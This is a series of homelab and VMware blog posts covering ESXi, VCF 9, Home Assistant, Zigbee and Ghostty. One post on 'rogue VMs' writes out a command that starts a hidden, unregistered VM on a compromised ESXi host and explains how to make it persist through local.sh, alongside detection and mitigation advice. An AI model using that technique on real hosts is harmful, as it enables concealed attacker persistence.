The ESXi hosts do not require a TPM 2.0 chip to use NKP, but a TPM chip provides enhanced security. How to configure NKP in vCenter # From your vSphere client, choose your vCenter – Configure – Key providers under Security: Press “Add” and choose “Add Native Key Provider”. Give your NKP a name. If you leave the “Use key provider only with TPM protected ESXi host (Recommended)” box checked, the NKP can only be used by hosts with a TPM 2.0. If you want hosts without a TPM to be able to use the NKP, just uncheck it. Your NKP will be configured and ready for use in about five minutes. --- # Casting Home Assistant Dashboards to Google Nest Hub 2nd Gen - Take 2 URL: https://vNinja.net/2025/07/20/homeassistant-google-nest-hub-2nd-gen-take2/ Date: 2025-07-20 Author: christian Tags: Home Assistant, Home Automation, Google Nest, Container Simplifying Home Assistant Dashboard Casting to Google Nest Hubs # Back in 2022, I shared how I used Cast All The Things (CATT) to display Home Assistant Lovelace dashboards on my Google Nest Hub 2nd gen. At the time, the setup was admittedly complex, relying on Node-RED to SSH into a virtual machine and trigger bash scripts. That approach served me well for a few years, but I’ve since streamlined the process significantly. With the help of two excellent tools, ha-catt-fix and the ryanbarrett/catt-chromecast container, I have eliminated the need for Node-RED and the custom scripts entirely. ha-catt-fix: Solving the Recast Problem # One of the main challenges with casting dashboards to Nest Hubs is the need to recast every 10 minutes, which I previously handled via Node-RED automations. Now, thanks to ha-catt-fix, that issue is resolved. Once installed and configured, it automatically takes care of keeping the cast alive with no extra logic required. Casting with ryanbarrett/catt-chromecast # Casting with the ryanbarrett/catt-chromecast container is straightforward. The only customization needed is the command that runs on container startup.
I use the following: 'sh' '-c' 'catt -d [Google Nest IP] cast_site [Lovelace URL]' I run one container per Nest Hub, which allows me to target different dashboards for each device depending on its location or use case. The rest of my Home Assistant setup remains unchanged. If you need a refresher, check out the Preparing Home Assistant section from the original post. --- # Migrating From Sonoff ZBDongle-P to SMLIGHT SLZB-MRW10 in Zigbee2MQTT URL: https://vNinja.net/2025/07/16/migrating-from-zbdongle-p-to-slzb-mrw10-zigbee2mqtt/ Date: 2025-07-16 Author: christian Tags: Home Assistant, Home Automation, Zigbee, Zigbee2MQTT My home Zigbee network has been powered by a Sonoff ZBDongle-P coordinator since 2022, and it’s worked very well. The problem with it is that it’s USB based, and since I run Zigbee2MQTT as an addon to Home Assistant in a VM, that VM needs to be pinned to a specific host in the cluster and I couldn’t move it around. Thankfully there’s been some great development around these kinds of devices in the last couple of years, and newer devices with direct network connectivity, powered via PoE, are now available. As an added bonus, these devices from SMLIGHT also have a built-in admin interface! I ended up ordering a SMLIGHT SLZB-MRW10, a two-radio version that provides Zigbee via a Texas Instruments CC2674P10 chip and Z-Wave via a Silicon Labs EFR32ZG23 chip. The last part was surprising to me, as I had originally planned to do Thread via the non-Zigbee radio. Turns out I should have ordered a SMLIGHT SLZB-MR3 and not the MRW10 edition, but for now this solves my Zigbee issues at least. Hopefully the MRW10 unit will get Thread support via a firmware upgrade at a later stage, as it’s currently in what SMLIGHT calls an “Evaluation Phase” — guess I’m an early adopter, even if unintentionally.
Migrating From Sonoff ZBDongle-P to SMLIGHT SLZB-MRW10 # Migrating from the old Sonoff ZBDongle-P to the SLZB-MRW10 was pretty simple, and this is the procedure I followed: Connect SLZB-MRW10 to my IoT VLAN network, powered via PoE Open a browser and connect via mDNS slzb-mrw10.local or the IP address assigned via DHCP Set static IP (Not really required, but I like to have static IPs for things like this) in “Network” -> “Ethernet Options” Configure Radio 1 (EFR32ZG23) for Z-Wave and Radio 2 (CC2674P10) for Zigbee under “Mode” Update all firmware in “Settings and Tools” -> “Firmware update” Configure time settings in “Settings and Tools” -> “Time Settings” Copy the IEEE address of the old Sonoff ZBDongle-P stick. This can be found in Zigbee2MQTT at “Settings” -> “About” -> “Coordinator IEEE Address” The migration from Sonoff ZBDongle-P to the CC2674P10 chip on the SLZB-MRW10 doesn’t require re-pairing of Zigbee devices (both run zstack), so copying the IEEE address should be enough to get the existing devices to connect to the new coordinator once Zigbee2MQTT utilizes it. Stop the Zigbee2MQTT addon in Home Assistant Paste the old IEEE address into the SLZB-MRW10 admin interface under “Z2M and ZHA” -> “ADVANCED: Adapter IEEE address change” -> “[CC2674P10] Flash custom IEEE address” Find the “Zigbee2MQTT and ZHA Config generator” section in “Z2M and ZHA”. Select “Zigbee2MQTT” and copy the generated Zigbee2MQTT config (or do it manually). Log into HA, find the Zigbee2MQTT addon config, and paste the new config in. In general, you will want to replace port: /dev/ttyUSB0 with port: tcp://ipaddress:port and ensure that baudrate: 115200 is set. Double-check that the IP address is correct, and that the right port for the right radio is selected (Radio 1 and Radio 2 use different ports) Start the Zigbee2MQTT addon If everything is configured correctly, Zigbee2MQTT should start up again, connecting to the SLZB-MRW10 device instead of the old USB device.
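For reference, the serial section of the Zigbee2MQTT addon config ends up looking something like this. This is a sketch with placeholder values, not my actual config: the IP address and TCP port depend on your SLZB-MRW10 setup, and the port differs per radio.

```yaml
serial:
  # Placeholder address and port: use your SLZB-MRW10's IP and the TCP
  # port of the radio you configured for Zigbee (Radio 1 and Radio 2
  # use different ports)
  port: tcp://192.0.2.10:6638
  baudrate: 115200
  # Both the ZBDongle-P and the CC2674P10 are TI chips, so the zstack
  # adapter type applies if Zigbee2MQTT doesn't detect it automatically
  adapter: zstack
```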
Wait until the Zigbee mesh network stabilizes; this might take some time while the network reconnects everything. Some battery-based devices might need a nudge to reconnect, like pressing a button or triggering some other kind of event. In my case, my existing Zigbee network was up and running in a couple of minutes, and I’ve had zero issues with it since migrating over. I had one older IKEA E1812 shortcut button that I couldn’t reconnect to my network before changing coordinators. After the migration, it was adopted without issues. In general, it looks like my Link Quality Indication (LQI) has improved for pretty much all devices, and the network seems to respond quicker than before. Finally, I can vMotion my HA VM without planning or moving USB connections, and it seems I got better Zigbee performance out of it as well. I like it! --- # VMware Critical Security Advisory: VMSA-2025-0013 URL: https://vNinja.net/2025/07/15/vmware-critical-security-advisory-vmsa-2025-0013/ Date: 2025-07-15 Author: christian Tags: VMware, vSphere, ESXi, Workstation, Fusion, VMware Tools Back in May, at Pwn2Own Berlin 2025, a couple of new VMware ESXi, Workstation/Fusion, and VMware Tools vulnerabilities were successfully exploited. Today Broadcom has released a new security advisory, VMSA-2025-0013, specifically addressing these vulnerabilities. The fixed vulnerabilities are as follows, with the corresponding CVSSv3 scores: VMXNET3 integer-overflow vulnerability (CVE-2025-41236) # Maximum CVSSv3 base score of 9.3. VMCI integer-underflow vulnerability (CVE-2025-41237) # Maximum CVSSv3 base score of 9.3. PVSCSI heap-overflow vulnerability (CVE-2025-41238) # Maximum CVSSv3 base score of 9.3. vSockets information-disclosure vulnerability (CVE-2025-41239) # CVSSv3 base score of 7.1. Comments # With CVSSv3 base scores as high as 9.3, it’s important to get all systems patched as soon as possible, before these vulnerabilities get exploited in the wild.
Broadcom has also created its own FAQ page with more details: VMSA-2025-0013: Questions & Answers, which covers a lot of good information. This bullet point in the FAQ especially highlights the danger this poses: Is this a “VM Escape?” Yes. This is a situation where an attacker who has already compromised a virtual machine’s guest OS and gained privileged access (administrator or root) could escape into the hypervisor itself. These issues are resolved by updating ESX. The short of it is that ALL ESXi/ESX and VMware Tools versions are affected by this, and need to be patched ASAP. --- # VMware Explore on Tour 2025: London URL: https://vNinja.net/2025/07/09/vmware-explore-on-tour-2025-london/ Date: 2025-07-09 Author: christian Tags: VMware Explore, Explore, VMware Explore 2025 Registration for VMware Explore on Tour in London on the 17th and 18th of September 2025 is now live! The agenda is pretty sparse so far, but I’m sure more details will be available after VMware Explore 2025 in Las Vegas, August 25th to 28th. Which breakout sessions will be presented in London is determined after the main event in Las Vegas. On the heels of Explore on Tour London, on the 18th, my friends over at VMUG UK are hosting the VMUG UK UserCon at the same location as Explore on Tour (The Hilton Metropole), and it’s great to see several familiar faces on the speaker list. I have been lucky enough to have a session accepted, so I will be present at both events. My session, vSphere: It’s All Fun and Games Until Someone Gets Root, is scheduled for Thursday the 18th at 5:15 PM, and I hope to see you there! Even if you’re not attending VMware Explore on Tour in London, you can still attend the VMUG UK UserCon free of charge; just make sure you register for the event. This should be a lot of fun!
--- # vSphere 8: Error Installing HA components failed URL: https://vNinja.net/2025/07/09/error-installing-ha-components-failed-vsphere-8/ Date: 2025-07-09 Author: christian Tags: VMware, vSphere, ESXi Errors when enabling vSphere High Availability (HA) in a cluster # Enabling vSphere HA in my homelab resulted in the following errors being displayed in my vCenter Web Client: Cannot complete the configuration of the vSphere HA agent on the host. "Applying HA VIBs on the cluster encountered a failure". Failed installing HA component on the host: host-34 An internal error occurred while staging/remediating the host. A general system error occurred: Installing HA components failed on the cluster: domain-c8 A quick search returned Configuring vSphere HA on an image-based cluster fails (384913), but that didn’t quite sit right with me, since HA was previously enabled on this cluster and no changes had been made to the image-based vLCM setup I use. The only change I had made was removing a failed host from the cluster. As part of the process of removing the failed host, I had also tried to mount its local NVMe device on the host that HA had issues enabling the HA agent on. Then it dawned on me: when mounting the NVMe device, I had stopped the USB Arbitrator service on the host in question in order to mount the NVMe drive via a USB enclosure. Logging back into the host via SSH and restarting the service with /etc/init.d/usbarbitrator start solved the issue, and I could enable HA again on the cluster without issues. TL;DR # The USB Arbitrator service not running on an ESXi host causes issues when enabling vSphere HA for a cluster.
--- # ESX to ESXi and Back Again URL: https://vNinja.net/2025/06/18/esx-to-esxi-and-back-again/ Date: 2025-06-18 Author: christian Tags: VMware, VCF, VVF, ESX, ESXi With the release of VMware Cloud Foundation 9, Broadcom has reverted the name of the hypervisor back to ESX, removing the ESXi name that was introduced with ESXi 4.1 when the old service console was removed. I don’t know why the change was made back to the original ESX naming, but the i was supposed to indicate that it was the “integrated” version without the service console. The service console has not been added back in ESX 9, but the name has been changed back to the original. Goodbye ESXi, it was a good 15-year run! Version naming and initial release year #

| Version | Initial Release Year |
|---|---|
| ESX 1.0 | 2001 |
| ESX 2.0 | 2003 |
| ESX 2.1 | 2004 |
| ESX 2.5 | 2005 |
| ESX 3.0 | 2006 |
| ESX 3.5 | 2007 |
| ESX 4.0 | 2009 |
| ESXi 4.1 | 2010 |
| ESXi 5.0 | 2011 |
| ESXi 5.1 | 2012 |
| ESXi 5.5 | 2013 |
| ESXi 6.0 | 2015 |
| ESXi 6.5 | 2016 |
| ESXi 6.7 | 2018 |
| ESXi 7.0 | 2020 |
| ESXi 8.0 | 2022 |
| ESX 9.0 | 2025 |

Note: Versions 3.5 and 4.0 were also available as ESXi editions, but 4.1 was the first release that only had ESXi as an option. All the documentation for VCF 9 references ESX, even for older versions which were named ESXi at the time of release. For more detailed information about all the releases and versions, check virten.net: VMware ESX Release and Build Number History VMware ESXi Release and Build Number History --- # VCF / VVF 9 Deprecation Notices URL: https://vNinja.net/2025/06/18/vcf9-deprecation-notices/ Date: 2025-06-18 Author: christian Tags: VMware, VCF, VVF While new features and enhancements are always exciting, new releases often also come with deprecation notices and end-of-support notices for features that were previously available, and those might also have a huge impact on a deployment. That is also the case for VCF 9 / VVF 9, and they are highlighted in the Release Notes for VCF 9 under Product Support Notes.
A few of these warrant a closer look, and here are some examples that caught my attention. This is not a complete list; check the Product Support Notes if any of these apply to your environment. vSphere # ESX # Deprecation of vSphere Auto Deploy Auto Deploy via PXE is being deprecated and will be removed in a future release. Deprecation of legacy log file formatting and deprecation of vmware.log and vmsyslogd message formats This one is interesting, especially since my colleague Espen Ødegaard posted Troubleshooting syslog from VMware ESXi 8 U2 IA and missing STRUCTURED-DATA using RFC5424-based syslog nearly two years ago. Hopefully the new logging format will adhere to the RFC. Removal of the internal runtime option execInstalledOnly Good! It was way too easy to turn off execInstalledOnly when logged into ESX, rendering the runtime option a bit useless. The runtime option is now removed, and the boot option is on by default. Anders Olsson has a great article explaining what this is, and how it works: VMware ESXi 8.0 and execInstalledOnly – The Good, the Bad and the Ugly. vCenter # Deprecation of vSphere Virtual Volumes This is a big one! vVols are being deprecated and will be removed in future releases. Support will continue for critical bug fixes only, and only in vSphere 8.x and VCF 5.2. Deprecation of vCenter Enhanced Linked Mode (ELM) VCF 9 does not use ELM to connect vCenters into a single sign-on domain. Support in v9 is only there to enable upgrades from existing environments to VCF 9, but in VCF 9 grouping in VCF Operations is the unified management method across vCenters. Deprecation of vSphere Host Profiles Not really new, but worth noting. Host Profiles have been replaced by vSphere Configuration Profiles. VMware Update Manager Download Service (UMDS) becomes part of the VMware Cloud Foundation Download Tool UMDS has been moved into the VCF Download tool, and will no longer be a standalone tool.
Removal of vSphere Lifecycle Manager baselines Also previously announced, vLCM Baselines (legacy VUM workflows) are no longer supported; image-based configuration in vLCM is the way to go. vSAN # Deprecation of the hybrid configuration in vSAN Original Storage Architecture (OSA) vSAN OSA Hybrid Mode has been deprecated, and it was about time too. I’ve not seen any hybrid implementations of vSAN in the last 4 or 5 years, and the time for it has passed. As mentioned, there are more notices in the official documentation. Make sure to read through those before starting to implement VCF/VVF 9, so you don’t get any surprises moving forward. --- # VCF 9.0 Is Here — What Does That Mean? URL: https://vNinja.net/2025/06/17/vcf9-is-here-what-does-that-mean/ Date: 2025-06-17 Author: christian Tags: VMware, VCF, VVF Broadcom released VMware Cloud Foundation 9 (VCF) into the world today. The News Release goes over the broad strokes, and lots of others have already posted about the release, so I won’t go into detail on all of it: Maarten Van Driessen — VCF 9 - News and Thoughts Don Horrox — Announced Features for VCF 9 Edd Watton — A First Look at VMware Cloud Foundation 9 VMware by Broadcom What’s New in VMware Cloud Foundation 9.0 Focus Change # The main focus in Broadcom’s announcement is that this is the realization of the “Modern Private Cloud”. The focus has switched from being everything, everywhere, for everyone (aka the old VMware Multi-Cloud vision) to a clear focus on Private Cloud — and Private Cloud only. This release also aligns all the products in the VCF (and vSphere Foundation (VVF)) stack into one product with a set of features, instead of a set of products combined into a “release”. If you want to get a look at what’s new in an interactive format, there is a Hands-on Lab available: What’s New in VMware Cloud Foundation 9.0 - Operations (HOL-2610-03-VCF-L) What is included in VCF and VVF 9?
# Bill of Materials #

| VMware Cloud Foundation Component | vSphere Foundation Component | Build Number |
|---|---|---|
| VCF Installer | Yes | 24755599 |
| VMware ESX | Yes | 24755599 |
| VMware vCenter | Yes | 24755599 |
| VMware vSAN ESA Witness | Yes | 24755599 |
| VMware vSAN File Services | Yes | 24755599 |
| VMware vSAN OSA Witness | Yes | 24755599 |
| VMware NSX | No | 24755599 |
| SDDC Manager | Yes | 24755599 |
| VMware Cloud Foundation Operations | Yes | 24755599 |
| VMware Cloud Foundation Operations orchestrator | Yes | 24755599 |
| VMware Cloud Foundation Operations collector | Yes | 24755599 |
| VMware Cloud Foundation Operations fleet management | No | 24755599 |
| VMware Cloud Foundation Operations for logs | Yes | 24755599 |
| VMware Cloud Foundation Operations for networks | No | 24755599 |
| VMware Cloud Foundation Operations HCX | No | 24755599 |
| VMware Cloud Foundation Automation | No | 24755599 |
| VMware vSphere Supervisor | Yes | 24755599 |
| VMware Kubernetes Backup & Recovery Service | Yes | 24755599 |
| VMware vSphere Kubernetes Service | Yes | 24755599 |
| VMware Remote Console | Yes | 24755599 |
| VMware Tools Async Release | Yes | 24755599 |
| VMware Cloud Foundation Download Tool | Yes | 24755599 |
| VMware Cloud Foundation Operations Identity Broker | No | 24755599 |

Notice that the build numbers are now uniform for all the components! (I wonder how that’s going to be handled going forward, when something needs to be patched. Also, I have a feeling that VMware Tools Async Release might not have that build number for long). ESX is back! Based on the BOM, it’s now VMware ESX (again) and not ESXi any more! Initial Highlights # Of course, all of the different components have their own set of new features, but going through all of them is something for future posts once I have some real experience with deploying them in production environments. There are, however, a few things I would like to highlight: Unified Installer # A welcome enhancement is a unified installer for both VCF and VVF: install ESX, deploy the installer appliance, select your edition (VCF or VVF), and get an automated installation of vCenter and other components.
Nice! Licensing # Another welcome change is how licenses are managed in VCF 9. While licensing has been a contentious topic since the Broadcom acquisition of VMware, there is finally a welcome change. There is now a single license file that covers the entire environment, and management of those has been moved to Operations. See Easy Licensing Has Arrived with VCF 9.0 — And It’s About Time! by Christopher Kusek for more details. Final Thoughts # VCF 9 shows that VCF has finally grown up into a proper product of its own. This is a welcome change, and should help drive adoption. Initial bring-up and management is simplified, and I really like the unified deployment model for both VCF and VVF. I like how Operations will now take center stage, something that’s natural since it’s included in both the VCF and VVF license. All in all, looking at the enhancements and changes that are being done, I like what I see. A refocused VMware (by Broadcom) delivering what they know best in a coherent and streamlined fashion is refreshing, and a welcome change. We’ve had a long time now with uncertainty and changes that might not have been well communicated or understood; finally, there’s something that makes perfect sense in the bigger picture. Lastly, I want to touch on something that might be overlooked as VCF 9 is released: what about the other licensing bundles, like vSphere Enterprise Plus (VSEP) and vSphere Standard (VVS)? Of course, these now get vSphere 9 (ESX and vCenter), but where do they fit into Broadcom’s focus on Private Cloud? My feeling is that they don’t. I will not be surprised if, somewhere down the line, both VSEP and VVS are dropped as licensing options, leaving customers with the choice of VVF or VCF only if they want to continue using VMware products. In the end, I think VVF will disappear as well, leaving VCF as the only option. Like it or not, that’s where I think we’re headed — just not right away.
Updates # Note: Added June 18th 2025 With licensing management being moved to Operations in VCF and VVF, and the new unified licensing scheme, how are licenses handled in VSEP and VVS? To me, that’s not clear, as the new release documentation doesn’t mention VSEP or VVS at all. Second addition: Note: Added June 18th 2025 Based on the information in VMware vSphere Product Line Comparison, it seems VSEP and VVS are being left behind (at least for now): Note that vSphere Standard and vSphere Enterprise Plus are only available as versions up to the 8 Update 3 release. Currently, vSphere 9.0 features are only available as part of VMware vSphere Foundation 9.0 and VMware Cloud Foundation 9.0. Hat tip to Stephen Wagner for pointing that out. --- # phpIPAM to Homepage URL: https://vNinja.net/2025/01/22/phpipam-to-homepage/ Date: 2025-01-22 Author: christian Tags: PowerShell, Container, Open Source, Lab, Homepage I recently set up Homepage, which offers an application/service dashboard for my resources. For a small home lab this works well, and it is very handy to have an easy-to-access dashboard like this available. It offers integration and widgets for a whole slew of services like Plex, Uptime Kuma and Synology. It even has native ICMP-based monitoring built in. All in all, it’s pretty slick! Homepage is fairly easy to set up and configure, but it requires editing the .yaml files it uses to render the dashboard. For small environments, like my home network, that’s not really a problem, but for larger, shared environments, maintaining these .yaml files manually gets messy over time. My shared work lab is one of these environments — but I still wanted to see if we could use Homepage as a dynamically updated, simple dashboard for the available services in that environment. Luckily, we use phpIPAM for IP address management and discovery, and it has an API we can use.
Enter phpIPAM to Homepage # Of course, this is designed for our specific use case, but in case someone else is looking to automate Homepage .yaml file generation, this could be a good starting point. phpIPAM to Homepage is a PowerShell script that does the following: Connect to the phpIPAM API Grab all valid hostnames from all subnets Iterate through all the hostnames, and scan them with nmap Create a services.yaml file for Homepage for all hosts that respond on any of the following ports: 22 (ssh) | 80 (http) | 443 (https) | 3389 (rdp). If a given host responds to more than one of these ports, add an entry for each port with a corresponding URI scheme link. The services.yaml file includes specific icons for each of the services discovered, as well as a naming convention that indicates which port was discovered (e.g. hostname:port). It does not, at least currently, create any fancy Homepage dashboards. All it does is create a very simple list of hosts with links to them. Sample services.yaml output #

- Discovered Hosts:
    - hostname1.example.com:22:
        href: ssh://hostname1.example.com
        icon: mdi-ssh
    - hostname2.example.com:443:
        href: https://hostname2.example.com
        icon: mdi-web
    - hostname2.example.com:80:
        href: http://hostname2.example.com
        icon: mdi-web
    - hostname3.example.com:3389:
        href: rdp://hostname3.example.com
        icon: mdi-remote-desktop

Screenshot # It can be run standalone as a PowerShell script, or as we use it in our lab environment: as a single-purpose container that runs, creates the .yaml file, and exits as soon as it’s done. This way we can schedule the container to run when we want it to, and it doesn’t take up any resources when it’s not active. For installation, configuration, and a ready-to-use Alpine Linux container, check phpIPAMtoHomepage on GitHub.
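The actual tool is a PowerShell script; as an illustration of the port-to-link mapping it performs, here is a minimal Python sketch. The function and variable names are hypothetical, and it assumes the hostnames have already been collected from phpIPAM and port-scanned.

```python
# Hypothetical sketch of the port-to-link mapping described above.
# Input: {hostname: [open ports]}; output: Homepage-style service entries.

PORT_MAP = {
    22: ("ssh", "mdi-ssh"),
    80: ("http", "mdi-web"),
    443: ("https", "mdi-web"),
    3389: ("rdp", "mdi-remote-desktop"),
}

def services_entries(scan_results):
    """Turn scan results into one entry per host:port, skipping other ports."""
    entries = []
    for host, ports in sorted(scan_results.items()):
        for port in sorted(p for p in ports if p in PORT_MAP):
            scheme, icon = PORT_MAP[port]
            entries.append({
                f"{host}:{port}": {
                    "href": f"{scheme}://{host}",
                    "icon": icon,
                }
            })
    return entries

if __name__ == "__main__":
    # A host responding on multiple known ports gets one entry per port
    for entry in services_entries({"hostname2.example.com": [80, 443, 8080]}):
        print(entry)
```

From there, serializing the entry list to services.yaml is a straightforward YAML dump.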
---
# Seamless Home Assistant NFC Automations on iPhone
URL: https://vNinja.net/2025/01/02/nfc-tags-iphone-home-assistant/
Date: 2025-01-02
Author: christian
Tags: Home Assistant, Home Automation

Home Assistant has the ability to read and write NFC tags via the Companion App, but using this on an iPhone is a bit cumbersome, as Apple doesn't allow apps to read NFC tags and perform an action without a confirmation from the user. This default setting makes sense, as I don't want random NFC tags triggering events on my phone, but there is no way of overriding this behaviour even for known tags — which sometimes defeats the purpose of having NFC tags automate actions and events in Home Assistant.

How to Create Seamless NFC Home Assistant Automations on an iPhone #

It also seems that NFC tags written by the Home Assistant Companion App include information about the app itself, so these tags will always trigger a confirmation. Luckily there is a way to work around this, by using the iOS Shortcuts app. Simply put, iOS Shortcuts can trigger an action in Home Assistant just by scanning an NFC tag, as long as you have the Companion App installed.

Creating a generic NFC tag with Simply NFC #

In order to do this, the NFC tags need to be written outside of Home Assistant. I have used Simply NFC with good results. Shortcuts only needs to be able to read a tag id, and Simply NFC makes it easy to do so. The only requirement for writing to a tag is to add a record to it — and this can be anything, for instance just a text string. Once that's done, write it to the NFC tag.

Creating an iOS Shortcut to Trigger HA Events #

Once you have a generic NFC tag written, create an iOS Shortcut that triggers an action (or something else) within Home Assistant. Open up Shortcuts on the iPhone. Click on the + in the top right corner, scroll down to NFC, and click it. Select Run Immediately if you don't want to have to confirm the action when the NFC tag is scanned.
Click on Scan, scan the NFC tag, and give it a name in the Name This Tag window that pops up. Click on Next in the top right corner and select New Blank Automation on the next screen. Scroll down to find Home Assistant and look for your preferred action. In this example I am just controlling a light, so I've chosen Control Light and selected a light for the automation. I've also set it to Toggle, so I can use the same tag to turn the light on or off. Click on Done, and that's it. The next time your iPhone reads the NFC tag, the chosen action will trigger without any confirmation required.

You could also have Shortcuts trigger a webhook in Home Assistant, but that is a less secure way of triggering actions, as a webhook doesn't require any form of authentication in Home Assistant, unlike the Companion App, which requires authentication in the app itself. The same method can be used to trigger more advanced scenarios in Home Assistant, like scenes or actions. It can also be used to trigger anything that the Shortcuts app can automate, without involving Home Assistant at all.

---
# Ghostty — Workaround for Missing or Unsuitable Terminal xterm-ghostty
URL: https://vNinja.net/2024/12/28/ghostty-workaround-for-missing-or-unsuitable-terminal-xterm-ghostty/
Date: 2024-12-28
Author: christian
Tags: zsh, terminal emulator, Ghostty

The newly public Ghostty terminal emulator by Mitchell Hashimoto (co-founder of HashiCorp) is all the rage at the moment, and it definitely looks interesting:

> Ghostty is a terminal emulator that differentiates itself by being fast, feature-rich, and native. While there are many excellent terminal emulators available, they all force you to choose between speed, features, or native UIs. Ghostty provides all three.

I decided to give it a spin on my MacBook, and see if it offers any improvements over Wezterm, which is my current terminal emulator of choice.
So far so good, it seems to work very well and offers quite a few customization options. Also worth noting is ghostty.zerebos.com, which offers a Ghostty config tool.

The first real issue I had with it was when using SSH to connect to remote resources. This produced the missing or unsuitable terminal: xterm-ghostty error message, because the remote resource doesn't have the xterm-ghostty terminfo defined. The official Ghostty docs have some workarounds for it, but these are either too convoluted, like copying terminfo entries to all remote systems, or setting SetEnv TERM=xterm-256color in .ssh/config for each remote host. The other alternative is to set TERM=xterm-256color system wide, but that also affects other terminal emulators (as does setting it in .ssh/config).

Workaround #

My workaround is to set the TERM variable in my .zshrc file, but only if Ghostty is the terminal emulator in use (Wezterm doesn't have this issue). This way I don't have to do it for every remote host, or copy the Ghostty terminfo to them. This is simple to do, as the $TERM_PROGRAM variable contains the name of the emulator currently in use. Add the following to your .zshrc file, and the TERM=xterm-256color variable declaration is only done when .zshrc is processed in Ghostty, and not in other terminal emulators:

```shell
if [[ "$TERM_PROGRAM" == "ghostty" ]]; then
  export TERM=xterm-256color
fi
```

Update 16th of September 2025: Ghostty v1.2.0 has been released, which works around this problem. PR: #7608 SSH Improvements (Work-in-Progress) introduces the ability to set shell-integration-features = ssh-env,ssh-terminfo in the Ghostty config file. ssh-env sets environment compatibility, and ssh-terminfo installs the required terminfo on the remote host. This removes the need for the workaround above. See the release notes for details.

---
# Beware Of The Rogue VMs!
URL: https://vNinja.net/2024/11/11/beware-of-the-rogue-vms/
Date: 2024-11-11
Author: christian
Tags: vSphere, ESXi, vCenter, VMware, Security

At this year's VMware Explore 2024 in Barcelona, I did a presentation called "CMTY1321BCN: Beware Of The Rogue VMs!". A recording of the session is also available on the VMware Explore 2024 Community YouTube channel. Here is a quick text based recap of it.

What are Rogue VMs? #

First off, we need to define what a Rogue VM is. In short, a rogue VM is a VM that runs on an ESXi host, but you don't really know that it's running. It is not shown in the ESXi Host Client, or in the vSphere Web Client. Back in January 2024, MITRE's Networked Experimentation, Research, and Virtualization Environment (NERVE) was compromised through a series of vulnerabilities. They have written a detailed post-mortem of it that highlights all the details, but in short the attackers were able to inject their own VMs into the environment. VMs that don't show up using the "normal" administration interfaces.

How are Rogue VMs created? #

This is surprisingly easy to do. If someone has SSH and root access to an ESXi host, all that is required is to place a valid VM on an available datastore, edit the .vmx file to connect it to a valid network, and run the following command:

```shell
/bin/vmx -x /vmfs/volumes/volname/vmname/vmname.vmx 2>/dev/null 0>/dev/null &
```

This command starts the VM without registering it in the inventory (which is why it doesn't show up in the ESXi Host Client, or the vCenter Web Client), and sends the output to /dev/null. This VM then runs as a normal VM, but hidden. The vim-cmd vmsvc/getallvms (documentation) command will not show this VM, as that command queries the host inventory. esxcli vm process list (documentation), however, will show it, as it shows all the running VMs on the host, regardless of registration status.

How are Rogue VMs Made Persistent?
#

When an ESXi host boots, /etc/rc.local.d/local.sh is run, so making these VMs persistent once they are placed on an ESXi host is as simple as adding the vmx command above to it. Once that is done, the Rogue VM will autostart when the host reboots, still undetectable in the usual admin interfaces.

Identifying Rogue VMs #

There are a couple of available resources that will help identify Rogue VMs in an environment:

- Invoke-HiddenVMQuery by MITRE (PowerCLI)
- VirtualGHOST by CrowdStrike (PowerCLI)
- RVTools

In the RVTools vHealth tab, VMs located on a datastore, but not registered with the inventory, are identified as "Possibly a Zombie VM!"

Rogue VM Mitigation Strategies #

- Always keep vCenter and ESXi hosts patched.
- DO NOT enable SSH on your ESXi hosts (or vCenter). "Everything" can be done through vCenter/Host Client/APIs anyway; there are few real world use cases where SSH needs to be enabled at all. Open SSH only when required, and close it after use.
- Monitor ESXi logs for SSH enablement and logins, and look for these events:
  - /var/log/shell.log: SSH[ID]: SSH login enabled, and shell[ID]: Interactive shell session started
  - /var/log/auth.log: sshd[ID]: FIPS mode initialized
- Use Secure Boot. Secure Boot prohibits /etc/rc.local.d/local.sh from running on boot, thus preventing persistence.

Of course, if someone has SSH and root access to your ESXi hosts, all bets are off anyway, as they can do pretty much whatever they want. Make sure this is limited to only being available when absolutely required, and please practice safe ESXi!

---
# Rickrolling WiFi at VMware Explore Barcelona 2024
URL: https://vNinja.net/2024/11/08/rickrolling-wifi-at-vmware-explore-barcelona-2024/
Date: 2024-11-08
Author: christian
Tags: WiFi, VMware Explore, ESP32

This last week I attended VMware Explore 2024 in Barcelona. While I was at the conference, I had a small ESP32 board with an external antenna in my backpack, connected to a powerbank.
The sole purpose of this little device was to provide some fun random WiFi SSIDs, and to see if anyone actually connected to it.

ESP32 in its little 3D printed box

All it did was cycle through all the lyrics of Rick Astley - Never Gonna Give You Up, and if someone connected to it, show a captive portal that had an ASCII drawing of Rick Astley on it, and the following text:

You can blame this on @h0bbel Have fun, be excellent!

It then logged the connection in a logfile on the ESP32 itself. No client details were logged, only that a connection was made, and a timestamp based on milliseconds since the ESP32 was powered on. Now, after running it from Monday to Wednesday at the Fira, the results are in, and all in all there were 63 connections made to my little device. Day 1 had 33 connections, day two had 25, and the last day only 5. Make of that what you will, but obviously I did get to Rickroll someone at the conference! If you were one of them, reach out — I'd love to hear from you! The source code for this little ESP32 experiment is available on GitHub: ESP32

---
# GL-iNet Opal (GL-SFT1200) Travel Router: First Impressions
URL: https://vNinja.net/2024/08/25/gl-inet-opal-travel-router-first-impressions/
Date: 2024-08-25
Author: christian
Tags: GL-iNet, Networking, DNS, WireGuard, Opal

For a while now I've been looking at travel routers, in order to have something small, light, and portable I can bring with me wherever I go. In my case, there are a couple of distinct use cases for such a device. I was looking for something that could piggyback on an existing WiFi network and create a new WiFi network behind it, and also have a physical Ethernet option. Bonus points if it could also tether to my phone and use its connection if required, either via a physical connection or WiFi sharing.

1. Security #

This is my main use case, and the primary reason why I was looking into travel routers to begin with.
I want to ensure that I run connections over (my home) WireGuard VPN as much as possible. I run Pi-Hole at home, and having the same DNS filtering and security when travelling is very nice. If I'm not connected through VPN, I also want to make sure that I run DNS over TLS, to protect my devices from DNS spoofing when connecting to WiFi hotspots offered in cafés, hotels and so on.

2. Multiple-device support #

Sometimes when I travel, especially when going on longer holidays, I bring my Apple TV with me. Having a local and secured WiFi with VPN connectivity ensures that the Apple TV can connect, and use my home network as its internet breakout — regardless of the actual physical location.

GL-iNet Opal (GL-SFT1200) Travel Router #

